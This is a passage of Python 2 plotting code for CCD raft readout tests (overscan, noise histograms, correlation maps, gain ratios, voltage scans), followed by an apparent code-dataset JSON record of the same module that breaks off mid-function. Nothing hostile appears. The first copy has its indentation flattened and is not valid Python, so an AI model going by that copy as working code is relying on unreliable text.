ax1.set_yticks(seg)
ax1.set_yticklabels(lab)
fig.subplots_adjust(right=0.8)
cbar_ax = fig.add_axes([0.85, 0.137, 0.05, 0.73])
fig.colorbar(im, cax=cbar_ax)
fig.suptitle("Inter CCD correlations " + TITLE, y=0.93, size=20)
plt.savefig(OUT_DIR + TITLE + '_cor_ccd.png')
plt.close(fig)
def plot_cor_all(a, img, TITLE, OUT_DIR, vmin=0, vmax=0.2):
fig = plt.figure(figsize=(15, 15))
im = plt.imshow(a, interpolation='nearest', cmap='jet', vmin=vmin, vmax=vmax)
seg = np.arange(0, len(a), 16)
r = img.ccd_num / 9.0
plt.xticks(seg)
plt.yticks(seg)
for i, f in enumerate(img):
plt.text(-10 * r, 8 + 16 * i, f.dev_name,
size=15, verticalalignment='center')
widthB = 54 / img.ccd_num
widthB = str(widthB)
for i in np.arange(0, img.ccd_num, 3):
REB = 'REB' + img[i].dev_name[1:2]
plt.annotate(REB, xy=(-11 * r, 24 + i * 16), xytext=(-18 * r, 24 + i * 16), xycoords='data',
fontsize=20, annotation_clip=False, ha='center', va='center',
arrowprops=dict(arrowstyle='-[, widthB=%s, lengthB=1.5' % widthB, lw=2.0))
fig.subplots_adjust(right=0.82)
cbar_ax = fig.add_axes([0.85, 0.155, 0.05, 0.695])
fig.colorbar(im, cax=cbar_ax)
fig.suptitle("Overall correlations " + TITLE, y=0.91, size=20)
plt.savefig(OUT_DIR + TITLE + '_cor_all.png')
plt.close(fig)
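# Note (assumed input): `a` passed to plot_cor_ccd() / plot_cor_all() is the square
# segment-by-segment correlation matrix of size 16 * img.ccd_num, ordered CCD by CCD
# with 16 segments each.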
def plot_cor_ccd_mean(a, img, TITLE, OUT_DIR, vmin=-1, vmax=1):
fig = plt.figure(figsize=(15, 15))
im = plt.imshow(a, interpolation='nearest', cmap='jet', vmin=vmin, vmax=vmax)
loc = range(img.ccd_num)
labels = []
for fli in img:
labels.append(fli.dev_name)
plt.xticks(loc, labels)
plt.yticks(loc, labels)
fig.subplots_adjust(right=0.82)
cbar_ax = fig.add_axes([0.85, 0.155, 0.05, 0.695])
fig.colorbar(im, cax=cbar_ax)
fig.suptitle("Correlations of means of CCDs " + TITLE, y=0.91, size=20)
plt.savefig(OUT_DIR + TITLE + '_cor_ccd_mean.png')
plt.close(fig)
def plot_gains(gains, gain_ref, TITLES, OUT_DIR):
""" plot gains with respect to the reference gain,
whre reference gain is number => gains[gain_ref]"""
# print 'directory: %s' % OUT_DIR
# print 'TITLES:%s', TITLES
gain_ref_np = np.array(gains[gain_ref].gain)
ratios = []
for gain in gains:
gain_np = np.array(gain.gain)
dim = (min(gain_ref_np.shape[0], gain_np.shape[0]),
min(gain_ref_np.shape[1], gain_np.shape[1])
)
# print 'dim = ', dim
ratios.append(gain_np[0:dim[0], 0:dim[1]] / gain_ref_np[0:dim[0], 0:dim[1]])
# print 'Ratios = ', ratios
    rows = 2 * ((len(ratios) - 1) / 6 + 1)
cmap = plt.get_cmap('gnuplot')
colors = [cmap(i) for i in np.linspace(0, 1, len(ratios))]
fig, axes = plt.subplots(nrows=rows, ncols=6)
fig.set_size_inches(20,20)
axfl = axes.flatten()
for i, ratio in enumerate(ratios):
# print 'Plotting %s', TITLES[i]
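        # grid layout: axis j shows the zoomed histogram (0.9-1.1) for ratio i,
        # and axis j + 6 (the row directly below) shows the full-range histogram (0-2)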
        j = (i / 6) * 12 + i % 6
ax = axfl[j]
ax2 = axfl[j+6]
ax.hist(np.reshape(ratio, -1), 20, range=(0.9, 1.1), facecolor=colors[i])
ax.set_title(TITLES[i], size=20)
ax2.hist(np.reshape(ratio, -1), 50, range=(0., 2.), facecolor=colors[i])
fig.suptitle("Gains with ref gain '%s'" % TITLES[gain_ref], y=0.95, size=25)
# fig.tight_layout()
plt.savefig(OUT_DIR + 'gain.png')
plt.close(fig)
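# Usage sketch (assumptions: each element of `gains` exposes a .gain attribute
# convertible to an (n_ccd, 16) numpy array, and `gain_ref` indexes into `gains`;
# the run titles are only illustrative):
#
#     plot_gains(gains, 0, ['run_A', 'run_B', 'run_C'], out_dir + '/')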
def plot_raft_map(data, img, TITLE, OUTDIR, vmin=None, vmax=None):
""" create a raft map 6x24 for data in CCDsx16 array """
map = np.zeros((6, 24))
for i, fli in enumerate(img):
x = (fli.dev_index / 3) * 2 # [0, 2, 4]
y = (fli.dev_index % 3) * 8 # [0, 8, 16]
for j in range(16):
xx = x + j / 8 # [0, 1,..., 5]
yy = y + j % 8 # [0, 1,..., 23]
map[xx, yy] = data[i, j]
yseg = range(6)
ylab = ["00-07", "10-17", "00-07", "10-17", "00-07", "10-17"]
xseg = range(0, 24, 4)
xlab = ["0", "4", "0", "4", "0", "4"]
fig = plt.figure(figsize=(10, 10))
ax1 = fig.add_subplot(111)
im = ax1.imshow(map, interpolation='nearest', cmap='jet', aspect=4, vmin=vmin, vmax=vmax)
plt.yticks(yseg, ylab)
plt.xticks(xseg, xlab)
plt.annotate('S22', xy=(0, 0), xytext=(4, -0.8), fontsize=15, ha='center', va='center')
plt.annotate('S12', xy=(0, 0), xytext=(12, -0.8), fontsize=15, ha='center', va='center')
plt.annotate('S02', xy=(0, 0), xytext=(20, -0.8), fontsize=15, ha='center', va='center')
plt.annotate('S02', xy=(0, 0), xytext=(24., 0.5), fontsize=15, ha='left', va='center')
plt.annotate('S01', xy=(0, 0), xytext=(24., 2.5), fontsize=15, ha='left', va='center')
plt.annotate('S00', xy=(0, 0), xytext=(24., 4.5), fontsize=15, ha='left', va='center')
ax1.vlines(7.5, -0.5, 5.5)
ax1.vlines(15.5, -0.5, 5.5)
ax1.hlines(1.5, -0.5, 23.5)
ax1.hlines(3.5, -0.5, 23.5)
plt.subplots_adjust(left=0.07, bottom=0.05, right=0.8, top=0.95, wspace=0, hspace=0)
#cbar_ax = fig.add_axes([0.15, 0.03, 0.7, 0.05])
#fig.colorbar(im, cax=cbar_ax, orientation="horizontal")
cbar_ax = fig.add_axes([0.87, 0.15, 0.05, 0.7])
fig.colorbar(im, cax=cbar_ax)
fig.suptitle(TITLE, y=0.98, size=19)
plt.savefig(OUTDIR + TITLE + '.png')
plt.show()
plt.close(fig)
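# Worked example of the index math above (values chosen for illustration only):
# dev_index = 4 and segment j = 10 give x = (4 / 3) * 2 = 2, y = (4 % 3) * 8 = 8,
# then xx = 2 + 10 / 8 = 3 and yy = 8 + 10 % 8 = 10, i.e. row 3, column 10 of the
# 6x24 raft map (integer division throughout).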
def plot_voltage_all(x, data, imgs, title, out_dir, suptitle=''):
if suptitle == '':
suptitle = title
fig = plt.figure(figsize=(20, 24))
cmap = plt.get_cmap('gist_ncar')
colors = [cmap(i) for i in np.linspace(0, 1, 16)]
for k in range(9):
ax1 = plt.subplot(3, 3, imgs[0][k].dev_index + 1)
ax1.set_title(imgs[0][k].dev_name)
for j in range(16):
y = []
for i in range(len(x)):
y.append(data[i][k][j])
plt.plot(x, y, label='Segment %i' % j, color=colors[j])
fig.suptitle(suptitle + '; all segments', y=0.99, size=20)
plt.legend(loc='lower left', bbox_to_anchor=(0.87, 1.1), ncol=4)
plt.subplots_adjust(bottom=0.04, left=0.04, top=0.88, right=0.96, wspace=0.1, hspace=0.1)
plt.savefig(out_dir + title + '_all.png')
plt.close(fig)
def plot_voltage_ccd(x, data, imgs, title, out_dir, suptitle=''):
if suptitle == '':
suptitle = title
fig = plt.figure(figsize=(15, 15))
for k in range(9):
ax1 = plt.subplot(3, 3, imgs[0][k].dev_index + 1)
ax1.set_title(imgs[0][k].dev_name)
y = []
for i in range(len(x)):
y.append(np.mean(data[i][k]))
plt.plot(x, y)
fig.suptitle(suptitle + '; mean of segments, per CCD', y=0.94, size=20)
plt.savefig(out_dir + title + '_CCD.png')
plt.close(fig)
def plot_voltage_raft(x, data, imgs, title, out_dir, suptitle=''):
if suptitle == '':
suptitle = title
fig = plt.figure(figsize=(7, 7))
y = []
for i in range(len(x)):
y.append(np.mean(data[i]))
plt.plot(x, y)
fig.suptitle(suptitle + '; mean of all segments', y=0.96, size=20)
plt.savefig(out_dir + title + '_raft.png')
plt.close(fig)
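# Usage sketch for the plot_voltage_* family (assumptions: `x` is a sequence of scan
# points, `data[i]` is a (9, 16) array of per-segment readings at x[i], and `imgs[0]`
# iterates over the nine CCD handles used for panel titles; the title is illustrative):
#
#     plot_voltage_all(x, data, imgs, 'OD_scan', out_dir + '/')
#     plot_voltage_ccd(x, data, imgs, 'OD_scan', out_dir + '/')
#     plot_voltage_raft(x, data, imgs, 'OD_scan', out_dir + '/')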
|
normal
|
{
"blob_id": "736861f18936c7a87ecf3deb134f589b9d7eed92",
"index": 3934,
"step-1": "\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.gridspec as gridspec\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable\n\n\ndef plot_overscan(overscan, img, TITLE, OUT_DIR):\n \"\"\" plot overscan in 9x2 plots with 16 channels \"\"\"\n fig = plt.figure(figsize=(20, 20))\n gs0 = gridspec.GridSpec(3, 3)\n\n for i, f in enumerate(img):\n x = f.dev_index % 3\n\n gs = gridspec.GridSpecFromSubplotSpec(\n 1, 2, wspace=0, subplot_spec=gs0[f.dev_index])\n ax2 = plt.subplot(gs[0, 0])\n for j in range(9, 17):\n plt.plot(overscan[i, j - 1] + 500 *\n (j - 8), label='seg' + str(j + 1))\n plt.legend(fontsize=6, loc='upper center', ncol=4)\n if x != 0:\n ax2.set_yticklabels([])\n\n plt.grid()\n plt.xlim(0, 2100)\n plt.ylim(0, 4500)\n ax2.set_title(f.dev_name + ' (seg 10-17)')\n\n ax1 = plt.subplot(gs[0, 1])\n for j in range(1, 9):\n plt.plot(overscan[i, j - 1] + 500 * j, label='seg' + str(j - 1))\n plt.legend(fontsize=6, loc='upper center', ncol=4)\n if x != 2:\n ax1.set_yticklabels([])\n if x == 2:\n ax1.yaxis.tick_right()\n plt.grid()\n plt.xlim(0, 2100)\n plt.ylim(0, 4500)\n ax1.set_title(f.dev_name + ' (seg 0-7)')\n\n fig.suptitle('Overscan ' + TITLE, y=0.94, size=20)\n plt.subplots_adjust(wspace=0.05)\n plt.savefig(OUT_DIR + TITLE + '_spatial.png')\n plt.close(fig)\n\n\ndef plot_overscan_diff(overscan, img, TITLE, OUT_DIR):\n \"\"\" plot overscan with subtracted 7th / 17th channel \"\"\"\n fig = plt.figure(figsize=(20, 20))\n gs0 = gridspec.GridSpec(3, 3)\n\n for i, f in enumerate(img):\n x = f.dev_index % 3\n\n gs = gridspec.GridSpecFromSubplotSpec(\n 1, 2, wspace=0, subplot_spec=gs0[f.dev_index])\n ax2 = plt.subplot(gs[0, 0])\n for j in range(9, 17):\n plt.plot(overscan[i, j - 1] - overscan[i, 15] +\n 500 * (j - 8), label='seg' + str(j + 1))\n plt.legend(fontsize=6, loc='upper center', ncol=4)\n if(x != 0):\n ax2.set_yticklabels([])\n\n plt.grid()\n plt.xlim(0, 2100)\n plt.ylim(0, 4500)\n ax2.set_title(f.dev_name + ' (seg 10-17)')\n\n ax1 = plt.subplot(gs[0, 1])\n for j in range(1, 9):\n plt.plot(overscan[i, j - 1] - overscan[i, 7] +\n 500 * j, label='seg' + str(j - 1))\n plt.legend(fontsize=6, loc='upper center', ncol=4)\n if(x != 2):\n ax1.set_yticklabels([])\n if(x == 2):\n ax1.yaxis.tick_right()\n plt.grid()\n plt.xlim(0, 2100)\n plt.ylim(0, 4500)\n ax1.set_title(f.dev_name + ' (seg 0-7)')\n #\tax1.set_title('S-'+f[7:9]+' (seg 0-7)')\n\n fig.suptitle('Overscan (diff) ' + TITLE, y=0.94, size=20)\n plt.subplots_adjust(wspace=0.05)\n plt.savefig(OUT_DIR + TITLE + '_diff_spatial.png')\n plt.close(fig)\n\n\ndef plot_mean_std_stddelta(m, n, nd, img, TITLE, OUT_DIR):\n \"\"\" plot std vs. mean vs. 
std_delta (comparison) \"\"\"\n fig = plt.figure(figsize=(15, 10))\n\n for i, f in enumerate(img):\n\n ax1 = plt.subplot(3, 3, f.dev_index + 1)\n lns1 = ax1.plot(m[i], 'o', color='green', label='offset')\n ax1.set_ylabel('mean')\n ax1.set_xlabel('segment num')\n\n ax2 = ax1.twinx()\n lns2 = ax2.plot(n[i], '^', color='blue', label='noise')\n ax2.set_ylabel('stdev')\n lns3 = ax2.plot(nd[i], 'v', color='red', label='dnoise')\n\n lns = lns1 + lns2 + lns3\n labs = [l.get_label() for l in lns]\n ax1.legend(lns, labs, bbox_to_anchor=(0., 1.07, 1., .102),\n fontsize='small', ncol=3, numpoints=1, loc=9)\n\n plt.grid()\n plt.title(' ' + f.dev_name, y=1.15)\n\n fig.suptitle('Offset, noise, dnoise comparison ' + TITLE, y=0.99, size=20)\n plt.subplots_adjust(wspace=0.5, hspace=0.6)\n plt.savefig(OUT_DIR + TITLE + '_std_vs_mean.png')\n plt.close(fig)\n\n\ndef plot_histogram_mean(m, TITLE, OUT_DIR):\n fig = plt.figure(figsize=(15, 15))\n m_all = m.ravel()\n\n for bin_num in np.arange(10, 100, 10):\n plt.subplot(3, 3, bin_num / 10)\n plt.hist(m_all, bin_num, facecolor='green')\n plt.title('Bins = ' + str(bin_num))\n\n plt.subplots_adjust(wspace=0.2, hspace=0.2)\n fig.suptitle('offset histogram ' + TITLE, y=0.92, size=20)\n plt.savefig(OUT_DIR + TITLE + '_mean_histo.png')\n plt.close(fig)\n\n\ndef plot_histogram_std(n, TITLE, OUT_DIR):\n fig = plt.figure(figsize=(15, 15))\n n_all = n.ravel()\n\n for bin_num in np.arange(10, 100, 10):\n plt.subplot(3, 3, bin_num / 10)\n plt.hist(n_all, bin_num, facecolor='green')\n plt.title('Bins = ' + str(bin_num))\n\n fig.suptitle('noise histogram ' + TITLE, y=0.92, size=20)\n plt.subplots_adjust(wspace=0.2, hspace=0.2)\n plt.savefig(OUT_DIR + TITLE + '_std_histo.png')\n plt.close(fig)\n\n\ndef plot_histogram_std_dev(nd, TITLE, OUT_DIR):\n fig = plt.figure(figsize=(15, 15))\n nd_all = nd.ravel()\n\n for bin_num in np.arange(10, 100, 10):\n plt.subplot(3, 3, bin_num / 10)\n plt.hist(nd_all, bin_num, facecolor='green')\n plt.title('Bins = ' + str(bin_num))\n\n fig.suptitle('dnoise histogram ' + TITLE, y=0.92, size=20)\n plt.subplots_adjust(wspace=0.2, hspace=0.2)\n plt.savefig(OUT_DIR + TITLE + '_stddelta_histo.png')\n plt.close(fig)\n\n\ndef plot_histogram_all(m, n, nd, TITLE, OUT_DIR):\n plot_histogram_mean(m, TITLE, OUT_DIR)\n plot_histogram_std(n, TITLE, OUT_DIR)\n plot_histogram_std_dev(nd, TITLE, OUT_DIR)\n\n\ndef plot_histogram_all_one_binning(m, n, nd, TITLE, OUT_DIR, bin_num=45,\n num_ccd=9, omit_REBs=[], read_REBs=set([0, 1, 2])):\n from matplotlib.patches import Rectangle\n\n if num_ccd != len(read_REBs) * 3:\n print \"ERROR! num_ccd = %i while number of REBs being read is %i.\" % (\n num_ccd, len(read_REBs)\n )\n return \"\\n\"\n\n fig = plt.figure(figsize=(15, 6))\n m_all = m.ravel()\n m_all = m_all[0:16 * num_ccd]\n n_all = n.ravel()\n n_all = n_all[0:16 * num_ccd]\n nd_all = nd.ravel()\n nd_all = nd_all[0:16 * num_ccd]\n\n # detect dead channels, DEF: noise <= 5\n dead = []\n for i in range(16 * num_ccd):\n if n_all[i] <= 5:\n dead.append(i)\n\n # not count not-clocking REBs for statistics\n # data stored in order 22, 21, 20 (REB 2), 12, 11, 10 (REB 1),...\n omit_REBs = set(omit_REBs)\n for REB in omit_REBs:\n if REB not in [0, 1, 2]:\n print \"WARNING! 
Wrong configuration of REBs to omit %s - unrecognized REBs.\\nContinuing with all REBs.\" % str(omit_REBs)\n break\n else:\n if omit_REBs:\n print \"Omiting REBs %s\" % omit_REBs\n i = -1\n for REB in read_REBs:\n i += 1\n if REB not in omit_REBs:\n continue\n pos = len(read_REBs) - i - 1\n omit = np.arange(pos * 48, pos * 48 + 48)\n dead = np.append(dead, omit)\n\n m_no_dead = np.delete(m_all, dead)\n n_no_dead = np.delete(n_all, dead)\n\n # get rid of subtracted channels for dnoise\n sub = np.arange(7, 16 * num_ccd, 8)\n dead = np.append(dead, sub)\n\n nd_no_dead = np.delete(nd_all, dead)\n nd_all = np.delete(nd_all, sub)\n\n # summary statstics computed only with live channels\n if len(n_no_dead):\n n_mean, n_median, n_std = np.mean(\n n_no_dead), np.median(n_no_dead), np.std(n_no_dead)\n else:\n n_mean, n_median, n_std = 0, 0, 0\n if len(m_no_dead):\n m_mean, m_median, m_std = np.mean(\n m_no_dead), np.median(m_no_dead), np.std(m_no_dead)\n else:\n m_mean, m_median, m_std = 0, 0, 0\n if len(nd_no_dead):\n nd_mean, nd_median, nd_std = np.mean(\n nd_no_dead), np.median(nd_no_dead), np.std(nd_no_dead)\n else:\n nd_mean, nd_median, nd_std = 0, 0, 0\n\n bin_num_lin = 4 * bin_num / 5\n bin_num_log = 1 * bin_num / 5\n bins_lin = np.linspace(0, 30, bin_num_lin)\n val_max = max(max(n_all), max(nd_all))\n if val_max <= 30:\n val_max = 50\n bins_log = np.logspace(np.log10(30), np.log10(val_max), bin_num_log)\n\n ax1 = fig.add_subplot(1, 2, 1)\n plt.hist(m_all, bin_num, facecolor='green')\n plt.title('Offset')\n\n textstr1 = '$\\mu=%.0f$\\n$\\mathrm{median}=%.0f$\\n$\\sigma=%.0f$' % (\n m_mean, m_median, m_std)\n props1 = dict(boxstyle='round', facecolor='green', alpha=0.4)\n ax1.text(0.76, 0.97, textstr1, transform=ax1.transAxes, fontsize=10,\n verticalalignment='top', bbox=props1)\n\n ax2 = fig.add_subplot(1, 2, 2)\n plt.hist(n_all, bins_lin, facecolor='blue', alpha=0.5, label='noise')\n plt.hist(nd_all, bins_lin, facecolor='red', alpha=0.5, label='dnoise')\n plt.title('Noises')\n plt.legend(loc='upper left')\n ax2.axvspan(0, 5, hatch='x', fill=False)\n ax2.set_xscale('linear')\n ax2.set_xlim((0, 30))\n ax2.set_xlim(left=0)\n ax2.spines['right'].set_visible(False)\n ax2.yaxis.set_ticks_position('left')\n plt.setp(ax2.get_xticklabels(), visible=True)\n\n divider = make_axes_locatable(ax2)\n axLin = divider.append_axes(\"right\", size=1.4, pad=0, sharey=ax2)\n axLin.set_xscale('log')\n axLin.hist(n_all, bins_log, facecolor='blue', alpha=0.5, label='noise')\n axLin.hist(nd_all, bins_log, facecolor='red', alpha=0.5, label='dnoise')\n axLin.autoscale()\n axLin.set_xlim(left=30)\n axLin.spines['left'].set_visible(False)\n axLin.yaxis.set_visible(False)\n axLin.yaxis.set_ticks_position('left')\n\n textstr2 = '$\\mu=%.1f$\\n$\\mathrm{median}=%.1f$\\n$\\sigma=%.1f$' % (\n n_mean, n_median, n_std)\n props2 = dict(boxstyle='round', facecolor='blue', alpha=0.4)\n plt.text(1.98, 0.97, textstr2, transform=ax1.transAxes, fontsize=10,\n verticalalignment='top', bbox=props2)\n\n textstr3 = '$\\mu=%.1f$\\n$\\mathrm{median}=%.1f$\\n$\\sigma=%.1f$' % (\n nd_mean, nd_median, nd_std)\n props3 = dict(boxstyle='round', facecolor='red', alpha=0.4)\n plt.text(1.98, 0.80, textstr3, transform=ax1.transAxes, fontsize=10,\n verticalalignment='top', bbox=props3)\n\n fig.suptitle(TITLE, y=0.98, size=20)\n#\tplt.subplots_adjust(wspace=0.2, hspace=0.2)\n plt.savefig(OUT_DIR + TITLE + '_histo.png')\n plt.close(fig)\n string_info = \"\\t%f\\t%f\\t%f\\t%f\\t%f\\t%f\\t%f\\t%f\\t%f\\n\" % (\n m_mean, m_median, m_std, n_mean, 
n_median, n_std, nd_mean, nd_median, nd_std)\n return string_info\n\n\ndef plot_summary(data, run, OUT_DIR, SUPTITLE=\"Runs comparison\"):\n cols = len(data)\n fig = plt.figure(figsize=(25, 9))\n x = range(cols)\n\n ax1 = plt.subplot(3, 1, 1)\n ax1.plot(x, data[:, 0], 'o', color='darkgreen', label='mean')\n ax1.errorbar(x, data[:, 0], marker='o',\n color='darkgreen', yerr=data[x, 2], linestyle='None')\n ax1.plot(x, data[:, 1], 'o', color='greenyellow', label='median')\n ax1.set_ylabel('Offset', color='green')\n ax1.legend(numpoints=1)\n\n ax2 = plt.subplot(3, 1, 2)\n ax2.plot(x, data[:, 3], 'o', color='darkblue', label='mean')\n ax2.errorbar(x, data[:, 3], marker='o', color='darkblue',\n yerr=data[x, 5], linestyle='None')\n ax2.plot(x, data[:, 4], 'o', color='lightskyblue', label='median')\n ax2.set_ylabel('Noise', color='blue')\n ax2.set_ylim([0, 20])\n# ax2.set_ylim(bottom=0)\n ax2.legend(numpoints=1)\n\n ax3 = plt.subplot(3, 1, 3)\n ax3.plot(x, data[:, 6], 'o', color='darkred', label='mean')\n ax3.errorbar(x, data[:, 6], marker='o', color='darkred',\n yerr=data[x, 8], linestyle='None')\n ax3.plot(x, data[:, 7], 'o', color='salmon', label='median')\n ax3.set_ylabel('DNoise', color='red')\n ax3.set_ylim([0, 20])\n# ax3.set_ylim(bottom=0)\n ax3.legend(numpoints=1)\n\n plt.xticks(x, run, rotation=45, ha='right', fontsize=7)\n fig.suptitle(SUPTITLE, y=0.96, size=20)\n plt.subplots_adjust(hspace=0.0, bottom=0.20, left=0.05)\n\n plt.savefig(OUT_DIR + 'Runs_summary.png')\n plt.close(fig)\n\n\ndef plot_one_run_summary(f, OUT_DIR, SUPTITLE=\"Run summary\"):\n data = np.loadtxt(f, usecols=range(1, 10))\n run = np.loadtxt(f, usecols=[0], dtype=str)\n if data.size == 9:\n print \"WARNING! Only one row in '%s'. Summary is not plotting.\\n\" % f\n return\n plot_summary(data, run, OUT_DIR, SUPTITLE)\n\n\ndef plot_cor_ccd(a, img, TITLE, OUT_DIR, vmin=0, vmax=0.2):\n fig = plt.figure(figsize=(15, 15))\n seg = [0, 7, 8, 15]\n lab = [\"0\", \"7\", \"10\", \"17\"]\n for i, f in enumerate(img):\n ax1 = plt.subplot(3, 3, f.dev_index + 1)\n\n i_min = 16 * i\n i_max = i_min + 16\n aa = a[i_min:i_max, i_min:i_max]\n im = plt.imshow(aa, interpolation='nearest', cmap='jet', vmin=vmin, vmax=vmax)\n ax1.set_title(f.dev_name)\n ax1.set_xlim(15.5, -0.5)\n ax1.set_ylim(-0.5, 15.5)\n ax1.set_xticks(seg)\n ax1.set_xticklabels(lab)\n ax1.set_yticks(seg)\n ax1.set_yticklabels(lab)\n fig.subplots_adjust(right=0.8)\n cbar_ax = fig.add_axes([0.85, 0.137, 0.05, 0.73])\n fig.colorbar(im, cax=cbar_ax)\n fig.suptitle(\"Inter CCD correlations \" + TITLE, y=0.93, size=20)\n plt.savefig(OUT_DIR + TITLE + '_cor_ccd.png')\n plt.close(fig)\n\n\ndef plot_cor_all(a, img, TITLE, OUT_DIR, vmin=0, vmax=0.2):\n fig = plt.figure(figsize=(15, 15))\n im = plt.imshow(a, interpolation='nearest', cmap='jet', vmin=vmin, vmax=vmax)\n seg = np.arange(0, len(a), 16)\n r = img.ccd_num / 9.0\n plt.xticks(seg)\n plt.yticks(seg)\n\n for i, f in enumerate(img):\n plt.text(-10 * r, 8 + 16 * i, f.dev_name,\n size=15, verticalalignment='center')\n\n widthB = 54 / img.ccd_num\n widthB = str(widthB)\n\n for i in np.arange(0, img.ccd_num, 3):\n REB = 'REB' + img[i].dev_name[1:2]\n plt.annotate(REB, xy=(-11 * r, 24 + i * 16), xytext=(-18 * r, 24 + i * 16), xycoords='data',\n fontsize=20, annotation_clip=False, ha='center', va='center',\n arrowprops=dict(arrowstyle='-[, widthB=%s, lengthB=1.5' % widthB, lw=2.0))\n\n fig.subplots_adjust(right=0.82)\n cbar_ax = fig.add_axes([0.85, 0.155, 0.05, 0.695])\n fig.colorbar(im, cax=cbar_ax)\n fig.suptitle(\"Overall 
correlations \" + TITLE, y=0.91, size=20)\n plt.savefig(OUT_DIR + TITLE + '_cor_all.png')\n plt.close(fig)\n\ndef plot_cor_ccd_mean(a, img, TITLE, OUT_DIR, vmin=-1, vmax=1):\n fig = plt.figure(figsize=(15, 15))\n im = plt.imshow(a, interpolation='nearest', cmap='jet', vmin=vmin, vmax=vmax)\n\n loc = range(img.ccd_num)\n labels = []\n for fli in img:\n labels.append(fli.dev_name)\n\n plt.xticks(loc, labels)\n plt.yticks(loc, labels)\n\n fig.subplots_adjust(right=0.82)\n cbar_ax = fig.add_axes([0.85, 0.155, 0.05, 0.695])\n fig.colorbar(im, cax=cbar_ax)\n fig.suptitle(\"Correlations of means of CCDs \" + TITLE, y=0.91, size=20)\n plt.savefig(OUT_DIR + TITLE + '_cor_ccd_mean.png')\n plt.close(fig)\n\ndef plot_gains(gains, gain_ref, TITLES, OUT_DIR):\n \"\"\" plot gains with respect to the reference gain,\n whre reference gain is number => gains[gain_ref]\"\"\"\n\n# print 'directory: %s' % OUT_DIR\n# print 'TITLES:%s', TITLES\n\n gain_ref_np = np.array(gains[gain_ref].gain)\n ratios = []\n for gain in gains:\n gain_np = np.array(gain.gain)\n dim = (min(gain_ref_np.shape[0], gain_np.shape[0]),\n min(gain_ref_np.shape[1], gain_np.shape[1])\n )\n# print 'dim = ', dim\n ratios.append(gain_np[0:dim[0], 0:dim[1]] / gain_ref_np[0:dim[0], 0:dim[1]])\n\n# print 'Ratios = ', ratios\n\n rows = 2*((len(ratios) -1) / 6 + 1)\n cmap = plt.get_cmap('gnuplot')\n colors = [cmap(i) for i in np.linspace(0, 1, len(ratios))]\n fig, axes = plt.subplots(nrows=rows, ncols=6)\n fig.set_size_inches(20,20)\n axfl = axes.flatten()\n for i, ratio in enumerate(ratios):\n# print 'Plotting %s', TITLES[i]\n\tj = (i / 6)*12 + i % 6\n ax = axfl[j]\n ax2 = axfl[j+6]\n ax.hist(np.reshape(ratio, -1), 20, range=(0.9, 1.1), facecolor=colors[i])\n ax.set_title(TITLES[i], size=20)\n ax2.hist(np.reshape(ratio, -1), 50, range=(0., 2.), facecolor=colors[i])\n\n fig.suptitle(\"Gains with ref gain '%s'\" % TITLES[gain_ref], y=0.95, size=25)\n # fig.tight_layout()\n plt.savefig(OUT_DIR + 'gain.png')\n plt.close(fig)\n\ndef plot_raft_map(data, img, TITLE, OUTDIR, vmin=None, vmax=None):\n \"\"\" create a raft map 6x24 for data in CCDsx16 array \"\"\"\n\n map = np.zeros((6, 24))\n for i, fli in enumerate(img):\n x = (fli.dev_index / 3) * 2 # [0, 2, 4]\n y = (fli.dev_index % 3) * 8 # [0, 8, 16]\n for j in range(16):\n xx = x + j / 8 # [0, 1,..., 5]\n yy = y + j % 8 # [0, 1,..., 23]\n map[xx, yy] = data[i, j]\n\n yseg = range(6)\n ylab = [\"00-07\", \"10-17\", \"00-07\", \"10-17\", \"00-07\", \"10-17\"]\n xseg = range(0, 24, 4)\n xlab = [\"0\", \"4\", \"0\", \"4\", \"0\", \"4\"]\n\n fig = plt.figure(figsize=(10, 10))\n ax1 = fig.add_subplot(111)\n im = ax1.imshow(map, interpolation='nearest', cmap='jet', aspect=4, vmin=vmin, vmax=vmax)\n plt.yticks(yseg, ylab)\n plt.xticks(xseg, xlab)\n plt.annotate('S22', xy=(0, 0), xytext=(4, -0.8), fontsize=15, ha='center', va='center')\n plt.annotate('S12', xy=(0, 0), xytext=(12, -0.8), fontsize=15, ha='center', va='center')\n plt.annotate('S02', xy=(0, 0), xytext=(20, -0.8), fontsize=15, ha='center', va='center')\n plt.annotate('S02', xy=(0, 0), xytext=(24., 0.5), fontsize=15, ha='left', va='center')\n plt.annotate('S01', xy=(0, 0), xytext=(24., 2.5), fontsize=15, ha='left', va='center')\n plt.annotate('S00', xy=(0, 0), xytext=(24., 4.5), fontsize=15, ha='left', va='center')\n ax1.vlines(7.5, -0.5, 5.5)\n ax1.vlines(15.5, -0.5, 5.5)\n ax1.hlines(1.5, -0.5, 23.5)\n ax1.hlines(3.5, -0.5, 23.5)\n plt.subplots_adjust(left=0.07, bottom=0.05, right=0.8, top=0.95, wspace=0, hspace=0)\n #cbar_ax = fig.add_axes([0.15, 
0.03, 0.7, 0.05])\n #fig.colorbar(im, cax=cbar_ax, orientation=\"horizontal\")\n cbar_ax = fig.add_axes([0.87, 0.15, 0.05, 0.7])\n fig.colorbar(im, cax=cbar_ax)\n fig.suptitle(TITLE, y=0.98, size=19)\n plt.savefig(OUTDIR + TITLE + '.png')\n plt.show()\n plt.close(fig)\n\ndef plot_voltage_all(x, data, imgs, title, out_dir, suptitle=''):\n if suptitle == '':\n suptitle = title\n fig = plt.figure(figsize=(20, 24))\n\n cmap = plt.get_cmap('gist_ncar')\n colors = [cmap(i) for i in np.linspace(0, 1, 16)]\n\n for k in range(9):\n ax1 = plt.subplot(3, 3, imgs[0][k].dev_index + 1)\n ax1.set_title(imgs[0][k].dev_name)\n for j in range(16):\n y = []\n for i in range(len(x)):\n y.append(data[i][k][j])\n plt.plot(x, y, label='Segment %i' % j, color=colors[j])\n\n fig.suptitle(suptitle + '; all segments', y=0.99, size=20)\n plt.legend(loc='lower left', bbox_to_anchor=(0.87, 1.1), ncol=4)\n plt.subplots_adjust(bottom=0.04, left=0.04, top=0.88, right=0.96, wspace=0.1, hspace=0.1)\n plt.savefig(out_dir + title + '_all.png')\n plt.close(fig)\n\ndef plot_voltage_ccd(x, data, imgs, title, out_dir, suptitle=''):\n if suptitle == '':\n suptitle = title\n fig = plt.figure(figsize=(15, 15))\n for k in range(9):\n ax1 = plt.subplot(3, 3, imgs[0][k].dev_index + 1) \n ax1.set_title(imgs[0][k].dev_name)\n y = []\n for i in range(len(x)):\n y.append(np.mean(data[i][k]))\n \n plt.plot(x, y)\n \n 